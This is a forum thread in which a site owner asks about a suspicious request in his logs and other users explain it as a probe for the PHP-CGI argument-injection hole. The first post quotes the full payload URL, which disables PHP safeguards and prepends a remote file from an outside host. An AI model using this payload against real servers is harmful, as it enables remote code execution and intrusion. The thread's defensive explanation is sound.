smith.james0 Posted October 25, 2013 Share Posted October 25, 2013 I have just looked at the web traffic on my site and found someone trying this address index.php?-d+safe_mode%3dOff+-d+disable_functions%3dNULL+-d+allow_url_fopen%3dOn+-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://nako.com.ua/index.txt.txt+-n from Mongolia 202.131.236.170 can anyone explain what they are trying to do? James Quote Link to comment https://forums.phpfreaks.com/topic/283280-whats-happening-here/ Share on other sites More sharing options...
Ch0cu3r Posted October 25, 2013 Share Posted October 25, 2013 Looks like they were trying to hack your site. Quote Link to comment https://forums.phpfreaks.com/topic/283280-whats-happening-here/#findComment-1455424 Share on other sites More sharing options...
requinix Posted October 25, 2013 Share Posted October 25, 2013 They're checking for a vulnerability if you have PHP installed as a CGI program. Short version is that you could pass command-line options to the PHP interpreter, and those options there would try to execute that one .txt file. Which is fortunately not malicious but would let them know your server was vulnerable. Quote Link to comment https://forums.phpfreaks.com/topic/283280-whats-happening-here/#findComment-1455430 Share on other sites More sharing options...
gizmola Posted October 25, 2013 Share Posted October 25, 2013 They're attempting to do a remote execution exploit, basically to see if you are vulnerable. If that exploit worked, your server would run the code at that mako dot com dot ua server, which doesn't do anything other than echo a string, but I'm guessing their spider would then go on to attempt further exploits, should it actually execute. Quote Link to comment https://forums.phpfreaks.com/topic/283280-whats-happening-here/#findComment-1455438 Share on other sites More sharing options...
smith.james0 Posted October 25, 2013 Author Share Posted October 25, 2013 Thanks for that James Quote Link to comment https://forums.phpfreaks.com/topic/283280-whats-happening-here/#findComment-1455461 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.